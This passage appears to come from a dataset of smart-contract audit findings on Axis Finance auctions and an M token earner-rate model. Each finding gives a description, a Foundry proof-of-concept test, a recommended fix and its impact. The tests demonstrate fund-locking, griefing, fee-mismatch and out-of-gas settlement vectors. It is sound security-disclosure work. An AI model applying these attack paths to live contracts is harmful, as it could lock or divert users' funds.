mockBaseToken.balanceOf(address(auctionHouse)) /1e18);\\n skip(86401);\\n vm.stopPrank();\\n\\n vm.startPrank(alice);\\n vm.expectRevert(\\n abi.encodeWithSelector(Auction.Auction_MarketNotActive.selector, 0)\\n );\\n auctionHouse.cancel(uint96(0), callbackData);\\n vm.stopPrank();\\n }\\n```\\n\\n```\\nLogs:\\n Here is the funding normalized before purchase: 75000000000\\n Here is the funding normalized after purchase: 65000000000\\n Balance of seler of quote tokens: 10000000000\\n Balance of bob in base token: 10000000000\\n Balance of auction house in base token: 65000000000\\n```\\n\\nTo run the test use: `forge test -vvv --mt test_FundedPriceAuctionStuckFunds`чImplement a function, that allows sellers to withdraw the amount left for a prefunded FPAM auction they have created, once the auction has concluded.чIf a prefunded FPAM auction concludes and there are still tokens, not bought from the users, they will be stuck in the `Axis-Finance` protocol.ч```\\n function _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n // Beyond the conclusion time\\n if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n // Capacity is sold-out, or cancelled\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n }\\n```\\n -User's can be grieved by not submitting the private keyчmediumчUser's can be grieved by not submitting the private key\\nBids cannot be refunded once the auction concludes. And bids cannot be claimed until the auction has been settled. Similarly a EMPAM auction cannot be cancelled once started.\\n```\\n function claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n )\\n external\\n override\\n onlyInternal\\n returns (BidClaim[] memory bidClaims, bytes memory auctionOutput)\\n {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotNotSettled(lotId_);\\n```\\n\\n```\\n function refundBid(\\n uint96 lotId_,\\n uint64 bidId_,\\n address caller_\\n ) external override onlyInternal returns (uint96 refund) {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfBeforeLotStart(lotId_);\\n _revertIfBidInvalid(lotId_, bidId_);\\n _revertIfNotBidOwner(lotId_, bidId_, caller_);\\n _revertIfBidClaimed(lotId_, bidId_);\\n _revertIfLotConcluded(lotId_);\\n```\\n\\n```\\n function _cancelAuction(uint96 lotId_) internal override {\\n // Validation\\n // Batch auctions cannot be cancelled once started, otherwise the seller could cancel the auction after bids have been submitted\\n _revertIfLotActive(lotId_);\\n```\\n\\n```\\n function cancelAuction(uint96 lotId_) external override onlyInternal {\\n // Validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotConcluded(lotId_);\\n```\\n\\n```\\n function _settle(uint96 lotId_)\\n internal\\n override\\n returns (Settlement memory settlement_, bytes memory auctionOutput_)\\n {\\n // Settle the auction\\n // Check that auction is in the right state for settlement\\n if (auctionData[lotId_].status != Auction.Status.Decrypted) {\\n revert Auction_WrongState(lotId_);\\n }\\n```\\n\\nFor EMPAM auctions, the private key associated with the auction has to be submitted before the auction can be settled. In auctions where the private key is held by the seller, they can grief the bidder's or in cases where a key management solution is used, both seller and bidder's can be griefed by not submitting the private key.чAcknowledge the risk involved for the seller and bidderчUser's will not be able to claim their assets in case the private key holder doesn't submit the key for decryptionч```\\n function claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n )\\n external\\n override\\n onlyInternal\\n returns (BidClaim[] memory bidClaims, bytes memory auctionOutput)\\n {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotNotSettled(lotId_);\\n```\\n -Bidder's payout claim could fail due to validation checks in LinearVestingчmediumчBidder's payout claim will fail due to validation checks in LinearVesting after the expiry timestamp\\nBidder's payout are sent by internally calling the `_sendPayout` function. In case the payout is a derivative which has already expired, this will revert due to the validation check of `block.timestmap < expiry` present in the mint function of LinearVesting derivative\\n```\\n function _sendPayout(\\n address recipient_,\\n uint256 payoutAmount_,\\n Routing memory routingParams_,\\n bytes memory\\n ) internal {\\n \\n if (fromVeecode(derivativeReference) == bytes7(\"\")) {\\n Transfer.transfer(baseToken, recipient_, payoutAmount_, true);\\n }\\n else {\\n \\n DerivativeModule module = DerivativeModule(_getModuleIfInstalled(derivativeReference));\\n\\n Transfer.approve(baseToken, address(module), payoutAmount_);\\n\\n=> module.mint(\\n recipient_,\\n address(baseToken),\\n routingParams_.derivativeParams,\\n payoutAmount_,\\n routingParams_.wrapDerivative\\n );\\n```\\n\\n```\\n function mint(\\n address to_,\\n address underlyingToken_,\\n bytes memory params_,\\n uint256 amount_,\\n bool wrapped_\\n )\\n external\\n virtual\\n override\\n returns (uint256 tokenId_, address wrappedAddress_, uint256 amountCreated_)\\n {\\n if (amount_ == 0) revert InvalidParams();\\n\\n VestingParams memory params = _decodeVestingParams(params_);\\n\\n if (_validate(underlyingToken_, params) == false) {\\n revert InvalidParams();\\n }\\n```\\n\\n```\\n function _validate(\\n address underlyingToken_,\\n VestingParams memory data_\\n ) internal view returns (bool) {\\n \\n // rest of code.\\n\\n=> if (data_.expiry < block.timestamp) return false;\\n\\n\\n // Check that the underlying token is not 0\\n if (underlyingToken_ == address(0)) return false;\\n\\n\\n return true;\\n }\\n```\\n\\nHence the user's won't be able to claim their payouts of an auction once the derivative has expired. For EMPAM auctions, a seller can also wait till this timestmap passes before revealing their private key which will disallow bidders from claiming their rewards.чAllow to mint tokens even after expiry of the vesting token / deploy the derivative token first itself and when making the payout, transfer the base token directly incase the expiry time is passedчBidder's won't be able claim payouts from auction after the derivative expiry timestampч```\\n function _sendPayout(\\n address recipient_,\\n uint256 payoutAmount_,\\n Routing memory routingParams_,\\n bytes memory\\n ) internal {\\n \\n if (fromVeecode(derivativeReference) == bytes7(\"\")) {\\n Transfer.transfer(baseToken, recipient_, payoutAmount_, true);\\n }\\n else {\\n \\n DerivativeModule module = DerivativeModule(_getModuleIfInstalled(derivativeReference));\\n\\n Transfer.approve(baseToken, address(module), payoutAmount_);\\n\\n=> module.mint(\\n recipient_,\\n address(baseToken),\\n routingParams_.derivativeParams,\\n payoutAmount_,\\n routingParams_.wrapDerivative\\n );\\n```\\n -Inaccurate value is used for partial fill quote amount when calculating feesчmediumчInaccurate value is used for partial fill quote amount when calculating fees which can cause reward claiming / payment withdrawal to revert\\nThe fees of an auction is managed as follows:\\nWhenever a bidder claims their payout, calculate the amount of quote tokens that should be collected as fees (instead of giving the entire quote amount to the seller) and add this to the protocol / referrers rewards\\n```\\n function claimBids(uint96 lotId_, uint64[] calldata bidIds_) external override nonReentrant {\\n \\n // rest of code.\\n\\n for (uint256 i = 0; i < bidClaimsLen; i++) {\\n Auction.BidClaim memory bidClaim = bidClaims[i];\\n\\n if (bidClaim.payout > 0) {\\n \\n=> _allocateQuoteFees(\\n protocolFee,\\n referrerFee,\\n bidClaim.referrer,\\n routing.seller,\\n routing.quoteToken,\\n=> bidClaim.paid\\n );\\n```\\n\\nHere bidClaim.paid is the amount of quote tokens that was transferred in by the bidder for the purchase\\n```\\n function _allocateQuoteFees(\\n uint96 protocolFee_,\\n uint96 referrerFee_,\\n address referrer_,\\n address seller_,\\n ERC20 quoteToken_,\\n uint96 amount_\\n ) internal returns (uint96 totalFees) {\\n // Calculate fees for purchase\\n (uint96 toReferrer, uint96 toProtocol) = calculateQuoteFees(\\n protocolFee_, referrerFee_, referrer_ != address(0) && referrer_ != seller_, amount_\\n );\\n\\n // Update fee balances if non-zero\\n if (toReferrer > 0) rewards[referrer_][quoteToken_] += uint256(toReferrer);\\n if (toProtocol > 0) rewards[_protocol][quoteToken_] += uint256(toProtocol);\\n\\n\\n return toReferrer + toProtocol;\\n }\\n```\\n\\nWhenever the seller calls claimProceeds to withdraw the amount of quote tokens received from the auction, subtract the quote fees and give out the remaining\\n```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n \\n // rest of code.\\n \\n uint96 totalInLessFees;\\n {\\n=> (, uint96 toProtocol) = calculateQuoteFees(\\n lotFees[lotId_].protocolFee, lotFees[lotId_].referrerFee, false, purchased_\\n );\\n unchecked {\\n=> totalInLessFees = purchased_ - toProtocol;\\n }\\n }\\n```\\n\\nHere purchased is the total quote token amount that was collected for this auction.\\nIn case the fees calculated in claimProceeds is less than the sum of fees allocated to the protocol / referrer via claimBids, there will be a mismatch causing the sum of (fees allocated + seller purchased quote tokens) to be greater than the total quote token amount that was transferred in for the auction. This could cause either the protocol/referrer to not obtain their rewards or the seller to not be able to claim the purchased tokens in case there are no excess quote token present in the auction house contract.\\nIn case, totalPurchased is >= sum of all individual bid quote token amounts (as it is supposed to be), the fee allocation would be correct. But due to the inaccurate computation of the input quote token amount associated with a partial fill, it is possible for the above scenario (ie. fees calculated in claimProceeds is less than the sum of fees allocated to the protocol / referrer via claimBids) to occur\\n```\\n function settle(uint96 lotId_) external override nonReentrant {\\n \\n // rest of code.\\n\\n if (settlement.pfBidder != address(0)) {\\n\\n _allocateQuoteFees(\\n feeData.protocolFee,\\n feeData.referrerFee,\\n settlement.pfReferrer,\\n routing.seller,\\n routing.quoteToken,\\n\\n // @audit this method of calculating the input quote token amount associated with a partial fill is not accurate\\n uint96(\\n=> Math.mulDivDown(\\n settlement.pfPayout, settlement.totalIn, settlement.totalOut\\n )\\n )\\n```\\n\\nThe above method of calculating the input token amount associated with a partial fill can cause this value to be higher than the acutal value and hence the fees allocated will be less than what the fees that will be captured from the seller will be\\nPOC\\nApply the following diff to `test/AuctionHouse/AuctionHouseTest.sol` and run `forge test --mt testHash_SpecificPartialRounding -vv`\\nIt is asserted that the tokens allocated as fees is greater than the tokens that will be captured from a seller for fees\\n```\\ndiff --git a/moonraker/test/AuctionHouse/AuctionHouseTest.sol b/moonraker/test/AuctionHouse/AuctionHouseTest.sol\\nindex 44e717d..9b32834 100644\\n--- a/moonraker/test/AuctionHouse/AuctionHouseTest.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/moonraker/test/AuctionHouse/AuctionHouseTest.sol\\n@@ -6,6 // Add the line below\\n6,8 @@ import {Test} from \"forge-std/Test.sol\";\\n import {ERC20} from \"solmate/tokens/ERC20.sol\";\\n import {Transfer} from \"src/lib/Transfer.sol\";\\n import {FixedPointMathLib} from \"solmate/utils/FixedPointMathLib.sol\";\\n// Add the line below\\nimport {SafeCastLib} from \"solmate/utils/SafeCastLib.sol\";\\n// Add the line below\\n\\n \\n // Mocks\\n import {MockAtomicAuctionModule} from \"test/modules/Auction/MockAtomicAuctionModule.sol\";\\n@@ -134,6 // Add the line below\\n136,158 @@ abstract contract AuctionHouseTest is Test, Permit2User {\\n _bidder = vm.addr(_bidderKey);\\n }\\n \\n// Add the line below\\n function testHash_SpecificPartialRounding() public {\\n// Add the line below\\n /*\\n// Add the line below\\n capacity 1056499719758481066\\n// Add the line below\\n previous total amount 1000000000000000000\\n// Add the line below\\n bid amount 2999999999999999999997\\n// Add the line below\\n price 2556460687578254783645\\n// Add the line below\\n fullFill 1173497411705521567\\n// Add the line below\\n excess 117388857750942341\\n// Add the line below\\n pfPayout 1056108553954579226\\n// Add the line below\\n pfRefund 300100000000000000633\\n// Add the line below\\n new totalAmountIn 2700899999999999999364\\n// Add the line below\\n usedContributionForQuoteFees 2699900000000000000698\\n// Add the line below\\n quoteTokens1 1000000\\n// Add the line below\\n quoteTokens2 2699900000\\n// Add the line below\\n quoteTokensAllocated 2700899999\\n// Add the line below\\n */\\n// Add the line below\\n\\n// Add the line below\\n uint bidAmount = 2999999999999999999997;\\n// Add the line below\\n uint marginalPrice = 2556460687578254783645;\\n// Add the line below\\n uint capacity = 1056499719758481066;\\n// Add the line below\\n uint previousTotalAmount = 1000000000000000000;\\n// Add the line below\\n uint baseScale = 1e18;\\n// Add the line below\\n\\n// Add the line below\\n // hasn't reached the capacity with previousTotalAmount\\n// Add the line below\\n assert(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(previousTotalAmount, baseScale, marginalPrice) <\\n// Add the line below\\n capacity\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n uint capacityExpended = FixedPointMathLib.mulDivDown(\\n// Add the line below\\n previousTotalAmount // Add the line below\\n bidAmount,\\n// Add the line below\\n baseScale,\\n// Add the line below\\n marginalPrice\\n// Add the line below\\n );\\n// Add the line below\\n assert(capacityExpended > capacity);\\n// Add the line below\\n\\n// Add the line below\\n uint totalAmountIn = previousTotalAmount // Add the line below\\n bidAmount;\\n// Add the line below\\n\\n// Add the line below\\n uint256 fullFill = FixedPointMathLib.mulDivDown(\\n// Add the line below\\n uint256(bidAmount),\\n// Add the line below\\n baseScale,\\n// Add the line below\\n marginalPrice\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n uint256 excess = capacityExpended - capacity;\\n// Add the line below\\n\\n// Add the line below\\n uint pfPayout = SafeCastLib.safeCastTo96(fullFill - excess);\\n// Add the line below\\n uint pfRefund = SafeCastLib.safeCastTo96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(uint256(bidAmount), excess, fullFill)\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n totalAmountIn -= pfRefund;\\n// Add the line below\\n\\n// Add the line below\\n uint usedContributionForQuoteFees;\\n// Add the line below\\n {\\n// Add the line below\\n uint totalOut = SafeCastLib.safeCastTo96(\\n// Add the line below\\n capacityExpended > capacity ? capacity : capacityExpended\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n usedContributionForQuoteFees = FixedPointMathLib.mulDivDown(\\n// Add the line below\\n pfPayout,\\n// Add the line below\\n totalAmountIn,\\n// Add the line below\\n totalOut\\n// Add the line below\\n );\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n {\\n// Add the line below\\n uint actualContribution = bidAmount - pfRefund;\\n// Add the line below\\n\\n// Add the line below\\n // acutal contribution is less than the usedContributionForQuoteFees\\n// Add the line below\\n assert(actualContribution < usedContributionForQuoteFees);\\n// Add the line below\\n console2.log(\"actual contribution\", actualContribution);\\n// Add the line below\\n console2.log(\\n// Add the line below\\n \"used contribution for fees\",\\n// Add the line below\\n usedContributionForQuoteFees\\n// Add the line below\\n );\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // calculating quote fees allocation\\n// Add the line below\\n // quote fees captured from the seller\\n// Add the line below\\n {\\n// Add the line below\\n (, uint96 quoteTokensAllocated) = calculateQuoteFees(\\n// Add the line below\\n 1e3,\\n// Add the line below\\n 0,\\n// Add the line below\\n false,\\n// Add the line below\\n SafeCastLib.safeCastTo96(totalAmountIn)\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // quote tokens that will be allocated for the earlier bid\\n// Add the line below\\n (, uint96 quoteTokens1) = calculateQuoteFees(\\n// Add the line below\\n 1e3,\\n// Add the line below\\n 0,\\n// Add the line below\\n false,\\n// Add the line below\\n SafeCastLib.safeCastTo96(previousTotalAmount)\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // quote tokens that will be allocated for the partial fill\\n// Add the line below\\n (, uint96 quoteTokens2) = calculateQuoteFees(\\n// Add the line below\\n 1e3,\\n// Add the line below\\n 0,\\n// Add the line below\\n false,\\n// Add the line below\\n SafeCastLib.safeCastTo96(usedContributionForQuoteFees)\\n// Add the line below\\n );\\n// Add the line below\\n \\n// Add the line below\\n console2.log(\"quoteTokens1\", quoteTokens1);\\n// Add the line below\\n console2.log(\"quoteTokens2\", quoteTokens2);\\n// Add the line below\\n console2.log(\"quoteTokensAllocated\", quoteTokensAllocated);\\n// Add the line below\\n\\n// Add the line below\\n // quoteToken fees allocated is greater than what will be captured from seller\\n// Add the line below\\n assert(quoteTokens1 // Add the line below\\n quoteTokens2 > quoteTokensAllocated);\\n// Add the line below\\n }\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n function calculateQuoteFees(\\n// Add the line below\\n uint96 protocolFee_,\\n// Add the line below\\n uint96 referrerFee_,\\n// Add the line below\\n bool hasReferrer_,\\n// Add the line below\\n uint96 amount_\\n// Add the line below\\n ) public pure returns (uint96 toReferrer, uint96 toProtocol) {\\n// Add the line below\\n uint _FEE_DECIMALS = 5;\\n// Add the line below\\n uint96 feeDecimals = uint96(_FEE_DECIMALS);\\n// Add the line below\\n\\n// Add the line below\\n if (hasReferrer_) {\\n// Add the line below\\n // In this case we need to:\\n// Add the line below\\n // 1. Calculate referrer fee\\n// Add the line below\\n // 2. Calculate protocol fee as the total expected fee amount minus the referrer fee\\n// Add the line below\\n // to avoid issues with rounding from separate fee calculations\\n// Add the line below\\n toReferrer = uint96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(amount_, referrerFee_, feeDecimals)\\n// Add the line below\\n );\\n// Add the line below\\n toProtocol =\\n// Add the line below\\n uint96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(\\n// Add the line below\\n amount_,\\n// Add the line below\\n protocolFee_ // Add the line below\\n referrerFee_,\\n// Add the line below\\n feeDecimals\\n// Add the line below\\n )\\n// Add the line below\\n ) -\\n// Add the line below\\n toReferrer;\\n// Add the line below\\n } else {\\n// Add the line below\\n // If there is no referrer, the protocol gets the entire fee\\n// Add the line below\\n toProtocol = uint96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(\\n// Add the line below\\n amount_,\\n// Add the line below\\n protocolFee_ // Add the line below\\n referrerFee_,\\n// Add the line below\\n feeDecimals\\n// Add the line below\\n )\\n// Add the line below\\n );\\n// Add the line below\\n }\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n\\n // ===== Helper Functions ===== //\\n \\n function _mulDivUp(uint96 mul1_, uint96 mul2_, uint96 div_) internal pure returns (uint96) {\\n```\\nчUse `bidAmount - pfRefund` as the quote token input amount value instead of computing the current wayчRewards might not be collectible or seller might not be able to claim the proceeds due to lack of tokensч```\\n function claimBids(uint96 lotId_, uint64[] calldata bidIds_) external override nonReentrant {\\n \\n // rest of code.\\n\\n for (uint256 i = 0; i < bidClaimsLen; i++) {\\n Auction.BidClaim memory bidClaim = bidClaims[i];\\n\\n if (bidClaim.payout > 0) {\\n \\n=> _allocateQuoteFees(\\n protocolFee,\\n referrerFee,\\n bidClaim.referrer,\\n routing.seller,\\n routing.quoteToken,\\n=> bidClaim.paid\\n );\\n```\\n -Settlement of batch auction can exceed the gas limitчmediumчSettlement of batch auction can exceed the gas limit, making it impossible to settle the auction.\\nWhen a batch auction (EMPAM) is settled, to calculate the lot marginal price, the contract iterates over all bids until the capacity is reached or a bid below the minimum price is found.\\nAs some of the operations performed in the loop are gas-intensive, the contract may run out of gas if the number of bids is too high.\\nNote that additionally, there is another loop in the `_settle` function that iterates over all the remaining bids to delete them from the queue. While this loop consumes much less gas per iteration and would require the number of bids to be much higher to run out of gas, it adds to the problem.\\nChange the minimum bid percent to 0.1% in the `EmpaModuleTest` contract in `EMPAModuleTest.sol`.\\n```\\n// Remove the line below\\n uint24 internal constant _MIN_BID_PERCENT = 1000; // 1%\\n// Add the line below\\n uint24 internal constant _MIN_BID_PERCENT = 100; // 0.1%\\n```\\n\\nAdd the following code to the contract `EmpaModuleSettleTest` in `settle.t.sol` and run `forge test --mt test_settleOog`.\\n```\\nmodifier givenBidsCreated() {\\n uint96 amountOut = 0.01e18;\\n uint96 amountIn = 0.01e18;\\n uint256 numBids = 580;\\n\\n for (uint256 i = 0; i < numBids; i++) {\\n _createBid(_BIDDER, amountIn, amountOut);\\n }\\n \\n _;\\n}\\n\\nfunction test_settleOog() external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidsCreated\\n givenLotHasConcluded\\n givenPrivateKeyIsSubmitted\\n givenLotIsDecrypted\\n{ \\n uint256 gasBefore = gasleft();\\n _settle();\\n\\n assert(gasBefore - gasleft() > 30_000_000);\\n}\\n```\\nчAn easy way to tackle the issue would be to change the `_MIN_BID_PERCENT` value from 10 (0.01%) to 1000 (1%) in the `EMPAM.sol` contract, which would limit the number of iterations to 100.\\nA more appropriate solution, if it is not acceptable to increase the min bid percent, would be to change the settlement logic so that can be handled in batches of bids to avoid running out of gas.\\nIn both cases, it would also be recommended to limit the number of decrypted bids that can be deleted from the queue in a single transaction.чSettlement of batch auction will revert, causing sellers and bidders to lose their funds.ч```\\n// Remove the line below\\n uint24 internal constant _MIN_BID_PERCENT = 1000; // 1%\\n// Add the line below\\n uint24 internal constant _MIN_BID_PERCENT = 100; // 0.1%\\n```\\n -An earner can still continue earning even after being removed from the approved list.чmediumчAn earner can still continue earning even after being removed from the approved list.\\nA `M` holder is eligible to earn the `Earner Rate` when they are approved by TTG. The approved `M` holder can call `startEarning()` then begin to earn the `Earner Rate`. They also can `stopEarning()` to quit earning.\\nHowever, when an approved `M` holder is disapproved, only the disapproved holder themselves can choose to stop earning; no one else has the authority to force them to quit earning.\\n`Earner Rate` is calculated in `StableEarnerRateModel#rate()` as below:\\n```\\n function rate() external view returns (uint256) {\\n uint256 safeEarnerRate_ = getSafeEarnerRate(\\n IMinterGateway(minterGateway).totalActiveOwedM(),\\n IMToken(mToken).totalEarningSupply(),\\n IMinterGateway(minterGateway).minterRate()\\n );\\n\\n return UIntMath.min256(maxRate(), (RATE_MULTIPLIER * safeEarnerRate_) / ONE);\\n }\\n\\n function getSafeEarnerRate(\\n uint240 totalActiveOwedM_,\\n uint240 totalEarningSupply_,\\n uint32 minterRate_\\n ) public pure returns (uint32) {\\n // solhint-disable max-line-length\\n // When `totalActiveOwedM_ >= totalEarningSupply_`, it is possible for the earner rate to be higher than the\\n // minter rate and still ensure cashflow safety over some period of time (`RATE_CONFIDENCE_INTERVAL`). To ensure\\n // cashflow safety, we start with `cashFlowOfActiveOwedM >= cashFlowOfEarningSupply` over some time `dt`.\\n // Effectively: p1 * (exp(rate1 * dt) - 1) >= p2 * (exp(rate2 * dt) - 1)\\n // So: rate2 <= ln(1 + (p1 * (exp(rate1 * dt) - 1)) / p2) / dt\\n // 1. totalActive * (delta_minterIndex - 1) >= totalEarning * (delta_earnerIndex - 1)\\n // 2. totalActive * (delta_minterIndex - 1) / totalEarning >= delta_earnerIndex - 1\\n // 3. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= delta_earnerIndex\\n // Substitute `delta_earnerIndex` with `exponent((earnerRate * dt) / SECONDS_PER_YEAR)`:\\n // 4. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= exponent((earnerRate * dt) / SECONDS_PER_YEAR)\\n // 5. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) >= (earnerRate * dt) / SECONDS_PER_YEAR\\n // 6. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) * SECONDS_PER_YEAR / dt >= earnerRate\\n\\n // When `totalActiveOwedM_ < totalEarningSupply_`, the instantaneous earner cash flow must be less than the\\n // instantaneous minter cash flow. To ensure instantaneous cashflow safety, we we use the derivatives of the\\n // previous starting inequality, and substitute `dt = 0`.\\n // Effectively: p1 * rate1 >= p2 * rate2\\n // So: rate2 <= p1 * rate1 / p2\\n // 1. totalActive * minterRate >= totalEarning * earnerRate\\n // 2. totalActive * minterRate / totalEarning >= earnerRate\\n // solhint-enable max-line-length\\n\\n if (totalActiveOwedM_ == 0) return 0;\\n\\n if (totalEarningSupply_ == 0) return type(uint32).max;\\n\\n if (totalActiveOwedM_ <= totalEarningSupply_) {//@audit-info rate is slashed\\n // NOTE: `totalActiveOwedM_ * minterRate_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n return uint32((uint256(totalActiveOwedM_) * minterRate_) / totalEarningSupply_);\\n }\\n\\n uint48 deltaMinterIndex_ = ContinuousIndexingMath.getContinuousIndex(\\n ContinuousIndexingMath.convertFromBasisPoints(minterRate_),\\n RATE_CONFIDENCE_INTERVAL\\n );//@audit-info deltaMinterIndex for 30 days\\n\\n // NOTE: `totalActiveOwedM_ * deltaMinterIndex_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n int256 lnArg_ = int256(\\n _EXP_SCALED_ONE +\\n ((uint256(totalActiveOwedM_) * (deltaMinterIndex_ - _EXP_SCALED_ONE)) / totalEarningSupply_)\\n );\\n\\n int256 lnResult_ = wadLn(lnArg_ * _WAD_TO_EXP_SCALER) / _WAD_TO_EXP_SCALER;\\n\\n uint256 expRate_ = (uint256(lnResult_) * ContinuousIndexingMath.SECONDS_PER_YEAR) / RATE_CONFIDENCE_INTERVAL;\\n\\n if (expRate_ > type(uint64).max) return type(uint32).max;\\n\\n // NOTE: Do not need to do `UIntMath.safe256` because it is known that `lnResult_` will not be negative.\\n uint40 safeRate_ = ContinuousIndexingMath.convertToBasisPoints(uint64(expRate_));\\n\\n return (safeRate_ > type(uint32).max) ? type(uint32).max : uint32(safeRate_);\\n }\\n```\\n\\nAs we can see, the rate may vary due to the changes in `MToken#totalEarningSupply()`, therefore the earning of fixed principal amount could be decreased if `totalEarningSupply()` increases. In some other cases the total earning rewards increases significantly if `totalEarningSupply()` increases, resulting in less `excessOwedM` sending to `ttgVault` when `MinterGateway#updateIndex()` is called.\\nCopy below codes to Integration.t.sol and run `forge test --match-test test_aliceStillEarnAfterDisapproved`\\n```\\n function test_AliceStillEarnAfterDisapproved() external {\\n\\n _registrar.updateConfig(MAX_EARNER_RATE, 40000);\\n _minterGateway.activateMinter(_minters[0]);\\n\\n uint256 collateral = 1_000_000e6;\\n _updateCollateral(_minters[0], collateral);\\n\\n _mintM(_minters[0], 400e6, _bob);\\n _mintM(_minters[0], 400e6, _alice);\\n uint aliceInitialBalance = _mToken.balanceOf(_alice);\\n uint bobInitialBalance = _mToken.balanceOf(_bob);\\n //@audit-info alice and bob had the same M balance\\n assertEq(aliceInitialBalance, bobInitialBalance);\\n //@audit-info alice and bob started earning\\n vm.prank(_alice);\\n _mToken.startEarning();\\n vm.prank(_bob);\\n _mToken.startEarning();\\n\\n vm.warp(block.timestamp + 1 days);\\n uint aliceEarningDay1 = _mToken.balanceOf(_alice) - aliceInitialBalance;\\n uint bobEarningDay1 = _mToken.balanceOf(_bob) - bobInitialBalance;\\n //@audit-info Alice and Bob have earned the same M in day 1\\n assertNotEq(aliceEarningDay1, 0);\\n assertEq(aliceEarningDay1, bobEarningDay1);\\n //@audit-info Alice was removed from earner list\\n _registrar.removeFromList(TTGRegistrarReader.EARNERS_LIST, _alice);\\n vm.warp(block.timestamp + 1 days);\\n uint aliceEarningDay2 = _mToken.balanceOf(_alice) - aliceInitialBalance - aliceEarningDay1;\\n uint bobEarningDay2 = _mToken.balanceOf(_bob) - bobInitialBalance - bobEarningDay1;\\n //@audit-info Alice still earned M in day 2 even she was removed from earner list, the amount of which is same as Bob's earning\\n assertNotEq(aliceEarningDay2, 0);\\n assertEq(aliceEarningDay2, bobEarningDay2);\\n\\n uint earnerRateBefore = _mToken.earnerRate();\\n //@audit-info Only Alice can stop herself from earning\\n vm.prank(_alice);\\n _mToken.stopEarning();\\n uint earnerRateAfter = _mToken.earnerRate();\\n //@audit-info The earning rate was almost doubled after Alice called `stopEarning`\\n assertApproxEqRel(earnerRateBefore*2, earnerRateAfter, 0.01e18);\\n vm.warp(block.timestamp + 1 days);\\n uint aliceEarningDay3 = _mToken.balanceOf(_alice) - aliceInitialBalance - aliceEarningDay1 - aliceEarningDay2;\\n uint bobEarningDay3 = _mToken.balanceOf(_bob) - bobInitialBalance - bobEarningDay1 - bobEarningDay2;\\n //@audit-info Alice earned nothing \\n assertEq(aliceEarningDay3, 0);\\n //@audit-info Bob's earnings on day 3 were almost twice as much as what he earned on day 2.\\n assertApproxEqRel(bobEarningDay2*2, bobEarningDay3, 0.01e18);\\n }\\n```\\nчIntroduce a method that allows anyone to stop the disapproved earner from earning:\\n```\\n function stopEarning(address account_) external {\\n if (_isApprovedEarner(account_)) revert IsApprovedEarner();\\n _stopEarning(account_);\\n }\\n```\\nчThe earnings of eligible users could potentially be diluted.\\nThe `excessOwedM` to ZERO vault holders could be dilutedч```\\n function rate() external view returns (uint256) {\\n uint256 safeEarnerRate_ = getSafeEarnerRate(\\n IMinterGateway(minterGateway).totalActiveOwedM(),\\n IMToken(mToken).totalEarningSupply(),\\n IMinterGateway(minterGateway).minterRate()\\n );\\n\\n return UIntMath.min256(maxRate(), (RATE_MULTIPLIER * safeEarnerRate_) / ONE);\\n }\\n\\n function getSafeEarnerRate(\\n uint240 totalActiveOwedM_,\\n uint240 totalEarningSupply_,\\n uint32 minterRate_\\n ) public pure returns (uint32) {\\n // solhint-disable max-line-length\\n // When `totalActiveOwedM_ >= totalEarningSupply_`, it is possible for the earner rate to be higher than the\\n // minter rate and still ensure cashflow safety over some period of time (`RATE_CONFIDENCE_INTERVAL`). To ensure\\n // cashflow safety, we start with `cashFlowOfActiveOwedM >= cashFlowOfEarningSupply` over some time `dt`.\\n // Effectively: p1 * (exp(rate1 * dt) - 1) >= p2 * (exp(rate2 * dt) - 1)\\n // So: rate2 <= ln(1 + (p1 * (exp(rate1 * dt) - 1)) / p2) / dt\\n // 1. totalActive * (delta_minterIndex - 1) >= totalEarning * (delta_earnerIndex - 1)\\n // 2. totalActive * (delta_minterIndex - 1) / totalEarning >= delta_earnerIndex - 1\\n // 3. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= delta_earnerIndex\\n // Substitute `delta_earnerIndex` with `exponent((earnerRate * dt) / SECONDS_PER_YEAR)`:\\n // 4. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= exponent((earnerRate * dt) / SECONDS_PER_YEAR)\\n // 5. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) >= (earnerRate * dt) / SECONDS_PER_YEAR\\n // 6. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) * SECONDS_PER_YEAR / dt >= earnerRate\\n\\n // When `totalActiveOwedM_ < totalEarningSupply_`, the instantaneous earner cash flow must be less than the\\n 